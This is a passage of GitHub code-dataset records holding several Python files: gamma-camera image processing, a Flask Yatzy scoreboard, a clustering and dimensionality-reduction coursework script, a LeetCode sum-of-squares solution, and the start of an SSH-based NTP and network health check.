self.processingParameters['energyWindow'])\n coordinates = processedData['Coordinates'][validEvents]\n imageArray = np.histogram2d(coordinates[:, 0], coordinates[:, 1], bins=matrix, range=imageRange)[0]\n if self.processingParameters['returnEnergySpectum'] or self.processingParameters['returnEmissionDistribution']:\n output = [imageArray]\n if self.processingParameters['returnEnergySpectum']:\n energySpectrum = self._acquireEnergySpectrum(processedData)\n output.append(energySpectrum)\n if self.processingParameters['returnEmissionDistribution']:\n emissionCoordinates = processedData['Emission coordinates'][validEvents]\n DataProcessor.convertToLocalCoordinates(\n emissionCoordinates,\n data['Origin'],\n data['R'],\n data['Rotation center']\n )\n emissionDistrubution = self._obtainEmissionDistrubution(emissionCoordinates)\n output.append(emissionDistrubution)\n 
return output\n return imageArray\n\n def _convertToScattersImage(self, data):\n processedData = self.processData(data['Interactions data'], self.scattersImageParameters)\n matrix, imageRange = self._getMatrixAndImageRange(data, self.scattersImageParameters)\n coordinates = processedData['Coordinates']\n indicesOfPeak = (processedData['Energy transfer'] == self.scattersImageParameters['peakEnergy']).nonzero()[0]\n peakImageArray = np.histogram2d(coordinates[indicesOfPeak, 0], coordinates[indicesOfPeak, 1], bins=matrix, range=imageRange)[0]\n validEvents = self.cutToEnergyWindow(processedData['Energy transfer'], self.processingParameters['energyWindow'])\n generalImageArray = np.histogram2d(coordinates[validEvents, 0], coordinates[validEvents, 1], bins=matrix, range=imageRange)[0]\n nulls = generalImageArray == 0\n peakImageArray[nulls] = 1\n generalImageArray[nulls] = 1\n scattersImageArray = 1 - peakImageArray/generalImageArray\n return scattersImageArray\n\n @staticmethod\n def updateParameters(parameters, newParameters):\n for key, value in newParameters.items():\n if key in parameters:\n parameters[key] = value\n\n @staticmethod\n def cutToEnergyWindow(energyTransfer, energyWindow):\n return np.nonzero((energyTransfer >= energyWindow[0])*(energyTransfer <= energyWindow[1]))[0]\n\n @staticmethod\n def processData(interactions_data, processingParameters):\n dataProcessor = DataProcessor()\n interactions_data = deepcopy(interactions_data)\n dataProcessor.addEmissionROI(interactions_data, processingParameters['emissionROI'])\n dataProcessor.averageActs(interactions_data, processingParameters['decayTime'], processingParameters['useDistanceTraveled'])\n dataProcessor.addEnergyDeviation(interactions_data, processingParameters['energyResolution'], processingParameters['referenceEnergy'])\n dataProcessor.addCoordinatesDeviation(interactions_data, processingParameters['spatialResolution'])\n return interactions_data\n\n\nclass DataSaver:\n\n def __init__(self, data, fileName, dataType=None, pixelSize=0.6):\n self.data = np.asarray(data)\n self._fileName = fileName\n self.dataType = dataType\n self.pixelSize = pixelSize\n\n @property\n def fileName(self):\n if self.data.ndim > 2:\n return self._fileName.split('/')[0] + ('' if self.dataType is None else '_' + self.dataType)\n return self._fileName.split('/')[-1] + ('' if self.dataType is None else '_' + self.dataType)\n\n def saveAsNumpy(self, rot=False):\n print(f'Saving {self.fileName} as Numpy')\n data = self.data\n if rot:\n if self.data.ndim > 2:\n data = np.rot90(self.data, k=-1, axes=(1, 2))\n else:\n data = np.rot90(self.data, k=-1)\n np.save(f'Numpy data/{self.fileName}.npy', data)\n\n def saveAsDicom(self):\n print(f'Saving {self.fileName} as Dicom')\n if self.data.ndim > 2:\n data = np.rot90(self.data, k=-1, axes=(1, 2))\n data = data[:, ::-1]\n else:\n data = np.rot90(self.data, k=-1)\n data = data[::-1]\n data = data/self.data.max()*255\n data = data.astype(np.ubyte)\n image = sitk.GetImageFromArray(data, isVector=False)\n image.SetOrigin((0., 0., 0.))\n image.SetSpacing([self.pixelSize*10, self.pixelSize*10, 1])\n image.SetMetaData('0010|0010', self.fileName)\n sitk.WriteImage(image, f'DICOM data/{self.fileName}.dcm')\n\n def saveAsDat(self):\n print(f'Saving {self.fileName} as Dat')\n data = self.data\n if self.data.ndim > 2:\n from pathlib import Path\n Path(f'Dat data/{self.fileName}').mkdir(parents=True, exist_ok=True)\n for i, image in enumerate(data, 1):\n image = image[::-1]\n np.savetxt(f'Dat data/{self.fileName}/{i}.dat', 
image, fmt='%i', delimiter='\\t')\n else:\n data = data[::-1]\n np.savetxt(f'Dat data/{self.fileName}.dat', data, fmt='%i', delimiter='\\t')\n\n\nif __name__ == '__main__':\n fileName = 'efg3cutWA'\n angles = np.linspace(-np.pi/4, 3*np.pi/4, 32)\n angles = np.round(np.rad2deg(angles), 1)\n nameList = [f'Raw data/{fileName}/{angle} deg' for angle in angles]\n nameList = [name + '.hdf' for name in nameList]\n\n dataExtractor = DataExtractor()\n data = dataExtractor.extractData(nameList)\n\n dataConverter = DataConverter()\n\n output = dataConverter.convertToImage(data)\n images = [image for image, spectrum, distribution in output]\n energySpectrums = [spectrum for image, spectrum, distribution in output]\n distributions = np.asarray([distribution for image, spectrum, distribution in output])\n\n dataSaver = DataSaver(images, fileName)\n dataSaver.saveAsNumpy(rot=True)\n dataSaver.saveAsDicom()\n dataSaver.saveAsDat()\n \n dataSaver = DataSaver(energySpectrums, fileName, 'spectrums')\n dataSaver.saveAsNumpy()\n\n dataSaver = DataSaver(distributions, fileName, 'distributions')\n dataSaver.saveAsNumpy()\n\n scattersImages = dataConverter.convertToScattersImage(data)\n dataSaver = DataSaver(scattersImages, fileName, 'scatters')\n dataSaver.saveAsNumpy()\n dataSaver.saveAsDicom()\n dataSaver.saveAsDat()\n\n","repo_name":"GurkoMikhail/Analysing","sub_path":"rawDataProcessing.py","file_name":"rawDataProcessing.py","file_ext":"py","file_size_in_byte":17827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28658893122","text":"from flask import Flask, request\nfrom flask import render_template\nfrom flask import redirect\nimport csv\nimport shutil\nimport time\nimport sys\nimport pathlib\nimport os\n\n\ndef get_datadir() -> pathlib.Path:\n home = pathlib.Path.home()\n if sys.platform == \"win32\":\n return home / \"AppData/Roaming\"\n elif sys.platform == \"linux\":\n return home / \".local/share\"\n elif sys.platform == \"darwin\":\n return home / \"Library/Application Support\"\n\n\nmy_datadir = get_datadir() / \"yatzy\"\ntry:\n my_datadir.mkdir(parents=False)\nexcept FileExistsError:\n pass\ntry:\n f = open(os.path.join(my_datadir, 'Name.csv'), \"x\")\nexcept FileExistsError:\n pass\n\napp = Flask(\"yatzy\")\\\n\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef start():\n if request.method == \"POST\":\n players = [\"Spielername\"]\n spieler1 = request.form.get(\"Spieler1\")\n if spieler1 != \"\":\n players.append(spieler1)\n spieler2 = request.form.get(\"Spieler2\")\n if spieler2 != \"\":\n players.append(spieler2)\n spieler3 = request.form.get(\"Spieler3\")\n if spieler3 != \"\":\n players.append(spieler3)\n spieler4 = request.form.get(\"Spieler4\")\n if spieler4 != \"\":\n players.append(spieler4)\n spieler5 = request.form.get(\"Spieler5\")\n if spieler5 != \"\":\n players.append(spieler5)\n spieler6 = request.form.get(\"Spieler6\")\n if spieler6 != \"\":\n players.append(spieler6)\n spieler7 = request.form.get(\"Spieler7\")\n if spieler7 != \"\":\n players.append(spieler7)\n spieler8 = request.form.get(\"Spieler8\")\n if spieler8 != \"\":\n players.append(spieler8)\n print(players)\n original_stdout = sys.stdout\n namecsv = os.path.join(my_datadir, \"Name.csv\")\n with open(namecsv, 'w') as f0:\n sys.stdout = f0\n print(*players, sep=';')\n sys.stdout = original_stdout\n return redirect(\"/yatzy\", code=301)\n else:\n return render_template(\"start.html\")\n\n\n@app.route('/yatzy', methods=['GET', 'POST'])\ndef yatzy():\n players = []\n namecsv = os.path.join(my_datadir, \"Name.csv\")\n with open(namecsv, \"r\") as f1:\n reader = csv.reader(f1)\n for row in reader:\n row = str(row).replace('\\\\', '')\n players = row.split(\";\", 9)\n player_count = str(len(players) - 1)\n zeit = time.strftime('%Y-%m-%d-%Hh%M', time.localtime())\n filename = (zeit + \"-Sp-\" + player_count + \".csv\")\n destinationfile = os.path.join(my_datadir, filename)\n sourcefile = (\"templates/spielplan/\" + player_count + \"-Spieler.csv\")\n shutil.copy(namecsv, destinationfile, follow_symlinks=True)\n players = []\n rows = []\n with open(namecsv)as f2:\n csvreader = csv.reader(f2, delimiter=\";\")\n for player in csvreader:\n players.append(player)\n with open(destinationfile, \"a+\", encoding='utf-8-sig') as f3:\n with open(sourcefile, \"r\", encoding='utf-8-sig') as f4:\n f3.write(f4.read())\n with open(destinationfile) as f5:\n csvreader = csv.reader(f5, delimiter=\";\")\n header = next(csvreader)\n for row in csvreader:\n rows.append(row)\n if request.method == \"POST\":\n points1 = []\n points2 = []\n points3 = []\n points4 = []\n points5 = []\n points6 = []\n points7 = []\n points8 = []\n punktesp1 = request.form.get(\"pSp1[]\")\n if punktesp1 != \"\":\n points1.append(punktesp1)\n punktesp2 = request.form.get(\"pSp2[]\")\n if punktesp2 != \"\":\n points2.append(punktesp2)\n punktesp3 = request.form.get(\"pSp3[]\")\n if punktesp3 != \"\":\n points3.append(punktesp3)\n punktesp4 = request.form.get(\"pSp4[]\")\n if punktesp4 != \"\":\n points4.append(punktesp4)\n punktesp5 = 
request.form.get(\"pSp5[]\")\n if punktesp5 != \"\":\n points5.append(punktesp5)\n punktesp6 = request.form.get(\"pSp6[]\")\n if punktesp6 != \"\":\n points6.append(punktesp6)\n punktesp7 = request.form.get(\"pSp7[]\")\n if punktesp7 != \"\":\n points7.append(punktesp7)\n punktesp8 = request.form.get(\"pSp8[]\")\n if punktesp8 != \"\":\n points8.append(punktesp8)\n with open(destinationfile, 'r') as f6:\n d_reader = csv.DictReader(f6, delimiter=\";\")\n for line in d_reader:\n print(line)\n return render_template(\"index.html\", ergebnise=rows, titel=header, spieler=players)\n else:\n return render_template(\"index.html\", ergebnise=rows, titel=header, spieler=players)\n\n\n@app.route('/nav')\ndef nav():\n return render_template(\"navbar.html\")\n\n\n@app.route('/ranking')\ndef test2():\n rows = []\n with open(\"templates/spielplan/highscore.csv\") as h:\n csvreader = csv.reader(h, delimiter=\";\")\n header = next(csvreader)\n for row in csvreader:\n rows.append(row)\n return render_template(\"ranking.html\", titel=header, tabelle=rows)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=5000)\n","repo_name":"anirbas7/PRO2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4272310762","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 1 19:55:59 2019\r\n\r\n@author: Ray\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport preprocess\r\n\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.mixture import GaussianMixture\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.decomposition import FastICA\r\nfrom scipy.stats import kurtosis\r\n\r\nfrom sklearn.random_projection import GaussianRandomProjection\r\n\r\n# feature importance using ExtraTreesClassifier\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\n\r\n# neural network for accuracy comparison\r\nfrom sklearn.neural_network import MLPClassifier\r\n\r\nseed = 50\r\n\r\ndef run_kmeans(data):\r\n scores = []\r\n for i in range(1, 30):\r\n print(f'KMeans: with K = {i}')\r\n clf = KMeans(n_clusters = i, random_state = seed, precompute_distances = True)\r\n clf.fit(data)\r\n scores.append(clf.inertia_)\r\n \r\n return scores\r\n\r\ndef run_pca_kmeans(data, principal_components = 1):\r\n clf = PCA(n_components = principal_components)\r\n data = clf.fit_transform(data)\r\n \r\n scores = []\r\n for i in range(1, 30):\r\n print(f'KMeans and PCA: with K = {i}')\r\n clf = KMeans(n_clusters = i, random_state = seed, precompute_distances = True)\r\n clf.fit(data)\r\n scores.append(clf.inertia_)\r\n \r\n return scores\r\n\r\ndef run_ica_kmeans(data, principal_components = 1):\r\n clf = FastICA(n_components = principal_components)\r\n data = clf.fit_transform(data)\r\n \r\n scores = []\r\n for i in range(1, 30):\r\n print(f'KMeans and ICA: with K = {i}')\r\n clf = KMeans(n_clusters = i, random_state = seed, precompute_distances = True)\r\n clf.fit(data)\r\n scores.append(clf.inertia_)\r\n \r\n return scores\r\n\r\ndef run_rp_kmeans(data, k = 1): \r\n scores = []\r\n for i in range(1, len(data.iloc[0])):\r\n print(f'KMeans and Random Projection: with num_components = {i}')\r\n clf_kmeans = KMeans(n_clusters = k, random_state = seed, precompute_distances = True)\r\n new_data = run_random_projection(data, num_components = i)\r\n clf_kmeans.fit(new_data)\r\n scores.append(clf_kmeans.inertia_)\r\n \r\n return scores\r\n \r\ndef run_EM(data):\r\n scores = []\r\n for i in range(1, len(data.iloc[0]) * 2):\r\n print(f'EM: with n_components = {i}')\r\n clf = GaussianMixture(n_components = i)\r\n clf.fit(data)\r\n scores.append(clf.score(data))\r\n \r\n return scores\r\n\r\ndef run_pca_EM(data, principal_components = 1):\r\n clf = PCA(n_components = principal_components)\r\n data = clf.fit_transform(data)\r\n \r\n scores = []\r\n for i in range(1, len(data[0]) * 2):\r\n print(f'EM and PCA: with K = {i}')\r\n clf = GaussianMixture(n_components = i)\r\n clf.fit(data)\r\n scores.append(clf.score(data))\r\n \r\n return scores\r\n\r\ndef run_ica_EM(data, principal_components = 1):\r\n clf = FastICA(n_components = principal_components)\r\n data = clf.fit_transform(data)\r\n \r\n scores = []\r\n for i in range(1, len(data[0]) * 2):\r\n print(f'EM and ICA: with K = {i}')\r\n clf = GaussianMixture(n_components = i)\r\n clf.fit(data)\r\n scores.append(clf.score(data))\r\n \r\n return scores\r\n\r\ndef run_rp_EM(data, k = 1): \r\n scores = []\r\n for i in range(1, len(data.iloc[0])):\r\n print(f'EM and Random Projection: with num_components = {i}')\r\n clf_EM = GaussianMixture(n_components = k)\r\n new_data = run_random_projection(data, num_components = i)\r\n clf_EM.fit(new_data)\r\n scores.append(clf_EM.score(new_data))\r\n \r\n return 
scores\r\n\r\ndef run_pca(data):\r\n scores = []\r\n for i in range(1, len(data.iloc[0])):\r\n print(f'PCA: with n_components = {i}')\r\n clf = PCA(n_components = i)\r\n clf.fit(data)\r\n scores.append(clf.score(data))\r\n \r\n return scores\r\n\r\ndef run_ica(data):\r\n scores = []\r\n for i in range(1, len(data.iloc[0])):\r\n print(f'ICA: with n_components = {i}')\r\n clf = FastICA(n_components = i, random_state = seed)\r\n temp = clf.fit_transform(data)\r\n scores.append(kurtosis(temp, axis = None))\r\n \r\n return scores\r\n\r\ndef run_random_projection(data, num_components):\r\n clf = GaussianRandomProjection(n_components = num_components, random_state = seed)\r\n return clf.fit_transform(data)\r\n\r\n\r\ndef run_feature_importance(data, y, title):\r\n column_names = data.columns\r\n \r\n forest = ExtraTreesClassifier(n_estimators = 250, random_state = seed)\r\n forest.fit(data, y)\r\n \r\n importances = forest.feature_importances_\r\n std = np.std([tree.feature_importances_ for tree in forest.estimators_], axis=0)\r\n indices = np.argsort(importances)[::-1]\r\n \r\n # Print the feature ranking\r\n print(\"Feature ranking:\")\r\n \r\n for f in range(data.shape[1]):\r\n print(\"%d. feature %d (%f)\" % (f + 1, indices[f], importances[indices[f]]))\r\n \r\n # Plot the feature importances of the forest\r\n plt.figure()\r\n plt.title(title)\r\n plt.bar(range(data.shape[1]), importances[indices],\r\n color=\"r\", yerr=std[indices], align=\"center\")\r\n # plt.xticks(range(data.shape[1]), indices)\r\n plt.xticks(range(data.shape[1]), [column_names[index] for index in indices])\r\n plt.xlim([-1, data.shape[1]])\r\n plt.show()\r\n \r\n return [column_names[indices[i]] for i in range(0, 3)]\r\n\r\ndef run_nn(X, y):\r\n clf = MLPClassifier(solver = 'sgd', activation = 'relu', learning_rate = 'adaptive', hidden_layer_sizes = (2, 8), \r\n batch_size = 32, shuffle = True, early_stopping = True, max_iter = 1000, random_state = 1).fit(X, y)\r\n \r\n return clf.score(X, y)\r\n\r\ndef compute_neural_network(a, b):\r\n ### PCA\r\n ### ICA\r\n ### RP\r\n ### Feature Importance\r\n \r\n # dataset a\r\n clf = PCA(n_components = 3)\r\n temp = clf.fit_transform(a[0])\r\n print(f'Admissions Dataset: PCA {run_nn(temp, a[1])}')\r\n \r\n clf = FastICA(n_components = 7, random_state = seed)\r\n temp = clf.fit_transform(a[0])\r\n print(f'Admissions Dataset: ICA {run_nn(temp, a[1])}')\r\n \r\n clf = GaussianRandomProjection(n_components = 2, random_state = seed)\r\n temp = clf.fit_transform(a[0])\r\n print(f'Admissions Dataset: RP {run_nn(temp, a[1])}')\r\n \r\n important_features = ['CGPA', 'GRE Score', 'TOEFL Score']\r\n temp_data = dict()\r\n for feature in important_features:\r\n temp_data[feature] = a[0][feature]\r\n \r\n temp = pd.DataFrame(temp_data)\r\n \r\n print(f'Admissions Dataset: Feature Importance {run_nn(temp, a[1])}')\r\n \r\n # dataset b\r\n ## 5 PCA, 7 ICA\r\n clf = PCA(n_components = 5)\r\n temp = clf.fit_transform(b[0])\r\n print(f'Income Dataset: PCA {run_nn(temp, b[1])}')\r\n \r\n clf = FastICA(n_components = 7, random_state = seed)\r\n temp = clf.fit_transform(b[0])\r\n print(f'Income Dataset: ICA {run_nn(temp, b[1])}')\r\n \r\n clf = GaussianRandomProjection(n_components = 2, random_state = seed)\r\n temp = clf.fit_transform(b[0])\r\n print(f'Income Dataset Dataset: RP {run_nn(temp, b[1])}')\r\n \r\n important_features = ['fnlwgt', 'age', 'education-num']\r\n temp_data = dict()\r\n for feature in important_features:\r\n temp_data[feature] = b[0][feature]\r\n \r\n temp = 
pd.DataFrame(temp_data)\r\n \r\n print(f'Income Dataset: Feature Importance {run_nn(temp, b[1])}')\r\n\r\nif __name__ == \"__main__\":\r\n plt.style.use('seaborn-whitegrid')\r\n \r\n ######## Dataset 1 Preprocessing\r\n a = pd.read_csv('Admission_Predict.csv')\r\n for column in a.columns:\r\n indexNames = a[a[column] == ' ?'].index\r\n # Delete these row indexes from dataFrame\r\n a.drop(indexNames, inplace=True)\r\n a, a_y = preprocess.PreProcessAdmission(a.drop('Chance of Admit', axis = 1), a['Chance of Admit'])\r\n \r\n ######## Dataset 2 Preprocessing\r\n b = pd.read_csv('adult.test')\r\n for column in b.columns:\r\n indexNames = b[b[column] == ' ?'].index\r\n # Delete these row indexes from dataFrame\r\n b.drop(indexNames, inplace=True)\r\n b, b_y = preprocess.PreProcessIncome(b.drop('income', axis = 1), b['income'])\r\n\r\n dataset = [a, b]\r\n # Run the clustering algorithms on the datasets and describe what you see.\r\n ############################# K-Means\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_kmeans(data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('K-Means for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('K-Means for Income Dataset')\r\n plt.xlabel('K')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ############################# EM Algorithm\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_EM(data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('EM for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('EM for Income Dataset')\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('Log-Likelihood loss')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n # Apply the dimensionality reduction algorithms to the two datasets and describe what you see.\r\n # Evaluation metric for PCA: Kaiser Criterion: use PCA with eigenvalues > 1\r\n ############################# PCA\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_pca(data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('PCA for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('PCA for Income Dataset')\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('Log-Likelihood loss')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ### 3 Principal Components for Admissions Dataset\r\n ### 5 Principal Components for Income Dataset\r\n ############################# PCA + K-Means\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n if i == 0:\r\n scores = run_pca_kmeans(data, principal_components = 3)\r\n plt.title(\"PCA(3 PC's) and K-Means for Admissions Dataset\")\r\n i += 1\r\n else:\r\n scores = run_pca_kmeans(data, principal_components = 5)\r\n plt.title(\"PCA(5 PC's) and K-Means for Income Dataset\")\r\n plt.xlabel('K')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ### 3 Principal Components for Admissions Dataset\r\n ### 5 Principal Components for Income Dataset\r\n ############################# PCA + EM Algorithm\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n if i == 0:\r\n scores = run_pca_EM(data, principal_components = 3)\r\n plt.title(\"PCA(3 PC's) and EM for Admissions Dataset\")\r\n i += 1\r\n else:\r\n scores = run_pca_EM(data, principal_components = 5)\r\n plt.title(\"PCA(5 PC's) and EM for Income Dataset\")\r\n plt.xlabel('Number of Components')\r\n 
plt.ylabel('Log-Likelihood loss')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ############################# ICA\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_ica(data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('ICA for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('ICA for Income Dataset')\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('Kurtosis Score')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ### 7 Principal Components for Admissions Dataset\r\n ### 7 Principal Components for Income Dataset\r\n ############################# ICA + K-Means\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n if i == 0:\r\n scores = run_ica_kmeans(data, principal_components = 7)\r\n plt.title(\"ICA(7 Components) and K-Means for Admissions Dataset\")\r\n i += 1\r\n else:\r\n scores = run_pca_kmeans(data, principal_components = 7)\r\n plt.title(\"ICA(7 Components) and K-Means for Income Dataset\")\r\n plt.xlabel('K')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ### 7 Principal Components for Admissions Dataset\r\n ### 7 Principal Components for Income Dataset\r\n ############################# ICA + EM Algorithm\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n if i == 0:\r\n scores = run_ica_EM(data, principal_components = 7)\r\n plt.title(\"ICA(3 PC's) and EM for Admissions Dataset\")\r\n i += 1\r\n else:\r\n scores = run_ica_EM(data, principal_components = 7)\r\n plt.title(\"ICA(5 PC's) and EM for Income Dataset\")\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('Log-Likelihood loss')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ############################# Randomized Projections\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_rp_kmeans(data, k = 5)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('Randomized Projection for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('Randomized Projection for Income Dataset')\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ############################# Feature Importance (Feature Selection Algorithm of my Choice)\r\n i = 0\r\n for data in dataset:\r\n if i == 0:\r\n important_features = run_feature_importance(data, a_y, 'Feature Importance for Admissions Dataset')\r\n else:\r\n important_features = run_feature_importance(data, b_y, 'Feature Importance for Income Dataset')\r\n \r\n temp_data = dict()\r\n for feature in important_features:\r\n temp_data[feature] = data[feature]\r\n \r\n temp_data = pd.DataFrame(temp_data)\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_kmeans(temp_data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('Feature Importance(Top 3) and K-Means for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('Feature Importance(Top 3) and K-Means for Income Dataset')\r\n plt.xlabel('K')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n compute_neural_network((a, a_y), (b, b_y))\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"rliu245/OMSCS-CS7641","sub_path":"Unsupervised Learning/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72565581314","text":"'''\n\nDescription:\n\nGiven a non-negative integer c, your task is to decide whether there are two integers a and b such that a^2 + b^2 = c.\n\n\n\nExample 1:\n\nInput: 5\nOutput: True\nExplanation: 1 * 1 + 2 * 2 = 5\n \n\nExample 2:\n\nInput: 3\nOutput: False\n\n'''\n\n\n\n'''\nSum of two squares theorem:\nAn integer greater than one can be written as a sum of two squares if and only if its prime decomposition contains no prime congruent to 3 modulo 4 raised to an odd power.\n'''\n\nfrom math import sqrt\n\nclass Solution:\n def judgeSquareSum(self, c: int) -> bool:\n \n # general form:\n # a^2 + b^2 == c where a <= b\n \n # c = (p1^q1) * (p2^q2) ... * (pk^qk)\n \n \n factor = 2\n \n # scan each prime factor\n while factor * factor <= c:\n \n exponent_of_factor = 0\n \n # check whether \" factor | c \" or not\n if c % factor == 0:\n \n # get the exponent of current factor\n while c % factor == 0:\n \n # accumulate the exponent of the prime factor\n exponent_of_factor += 1\n \n # update c\n c = c // factor\n \n \n # Reject factor decomposition in the form: \" (4k+3)^q | c \", where q is an odd integer\n if factor % 4 == 3 and exponent_of_factor % 2 != 0:\n return False\n \n # try next factor\n factor += 1\n \n # Reject number in the form: c = 4k+3 where k is a non-negative integer\n return c % 4 != 3\n\n\n\n# n : the input value\n\n## Time Complexity: O( sqrt( n ) * log(n) )\n#\n# The overhead in time is the outer loop iterating while factor * factor <= c, which is of O( sqrt(n) ).\n# And the inner while loop iterating on c % factor == 0, which is of O( log(n) )\n\n## Space Complexity: O( 1 )\n#\n#\n\n## Space Complexity: O( 1 )\n#\n# The overhead in space is the looping index and factor, exponent_of_factor for computation, which is of O( 1 ).\n\n\n\n\ndef test_bench():\n\n test_data = [3, 5, 13, 25, 18, 28, 33]\n\n # expected output:\n '''\n False\n True\n True\n True\n True\n False\n False \n '''\n\n for number in test_data:\n\n print( Solution().judgeSquareSum(number) )\n \n return \n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_0633_Sum of Square Numbers/sum_of_square_numbers_by_number_theorey.py","file_name":"sum_of_square_numbers_by_number_theorey.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"}
+{"seq_id":"11366567062","text":"import os\nimport re\n\nimport obspy\n\n\ndef check_serial(ssh, logger):\n ''' Get the MSS serial number.\n '''\n cmd = 'cat /home/mss/config/mss_serial'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n serial = ssh_stdout.readline().strip()\n\n return serial\n\n\ndef check_ntp(ssh, logger):\n ''' Check for a valid NTP connection.\n '''\n logger.info('Checking the NTP.')\n cmd = 'ntpq -np'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n response_list = ssh_stdout.readlines()\n response = \"\".join(response_list)\n \n working_server = []\n ntp_is_working = False\n\n if response.lower().startswith(\"no association id's returned\"):\n logger.error(\"NTP is not running. ntpd response:\\n %s\", response)\n else:\n # Search for the header line.\n header_token = \"===\\n\"\n header_end = response.find(header_token) + len(header_token)\n\n if not header_end:\n logger.error(\"NTP seems to be running, but no expected result was returned by ntpq: %s\", response)\n return []\n\n logger.info(\"NTP is running.\\n%s\", response)\n\n payload = response[header_end:]\n for cur_line in payload.splitlines():\n cur_data = re.split(' +', cur_line)\n if cur_line.startswith(\"*\") or cur_line.startswith(\"+\"):\n if (int(cur_data[4]) <= (int(cur_data[5]) * 2)) and (int(cur_data[6]) > 0):\n working_server.append(cur_data)\n\n if not working_server:\n logger.error(\"No working NTP servers found.\")\n else:\n ntp_is_working = True\n\n return ntp_is_working, response_list\n\n\ndef check_internet_conn(ssh, logger):\n ''' Check the connection to the internet.\n '''\n logger.info(\"Checking the connection to the internet.\")\n cmd = 'ping -c 1 mss.mertl-research.at'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n error_response = \"\".join(ssh_stderr.readlines()).strip()\n response = \"\".join(ssh_stdout.readlines()).strip()\n\n network_reachable = False\n\n if error_response or not response:\n logger.error(\"Error reaching mss.mertl-research.at using ping:\\n{:s}\".format(error_response))\n else:\n logger.info(\"Successfull ping to mss.mertl-research.at.\")\n network_reachable = True\n\n return network_reachable, response\n \n\ndef check_datalink(ssh, logger):\n ''' Check the connection to the datalink server.\n '''\n logger.info('Checking datalink connection.')\n\n datalink_connected = False\n\n cmd = 'ping -c 1 mss.mertl-research.at'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n error_response = \"\".join(ssh_stderr.readlines()).strip()\n response = \"\".join(ssh_stdout.readlines()).strip()\n\n if error_response or not response:\n logger.error(\"Error reaching mss.mertl-research.at using ping:\\n{:s}\".format(error_response))\n else:\n cmd = 'ss -natp'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n error_response = \"\".join(ssh_stderr.readlines()).strip()\n response = ssh_stdout.readlines()\n logger.info(\"Output of ss -natp:\\n%s\", ''.join(response))\n\n if response:\n for cur_line in response:\n cur_line = cur_line.strip()\n cur_data = 